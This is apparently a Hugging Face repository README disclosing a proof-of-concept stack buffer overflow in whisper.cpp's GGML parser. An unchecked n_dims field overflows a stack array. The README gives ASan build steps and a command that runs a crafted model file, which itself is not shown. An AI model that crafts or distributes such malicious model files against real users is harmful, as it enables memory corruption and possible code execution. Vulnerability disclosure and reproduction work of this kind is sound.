Rammadaeus
/

poc-whisper-stack-overflow-ndims

Model card Files Files and versions

poc-whisper-stack-overflow-ndims / README.md

Rammadaeus's picture

Add PoC and reproduction instructions

86d6533 verified 19 days ago

|

history blame contribute delete

899 Bytes

	# PoC: Stack Buffer Overflow in whisper.cpp GGML Parser

	Format: GGML (.bin)
	Target: whisper.cpp (ggml-org/whisper.cpp)
	CWE: CWE-121 (Stack-based Buffer Overflow)

	## Vulnerability

	Stack buffer overflow via unchecked `n_dims` in tensor loading. `n_dims > 4` causes writes past the `ne[4]` stack array with attacker-controlled values. Potential RCE.

	## Reproduction

	```bash
	git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
	mkdir build-asan && cd build-asan
	cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
	-DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
	-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
	make -j$(nproc)
	./bin/whisper-cli -m ../poc_stack_overflow.bin -f /dev/null
	```

	ASAN reports: `stack-buffer-overflow WRITE at whisper.cpp:1885`

	Tested: whisper.cpp commit 364c77f4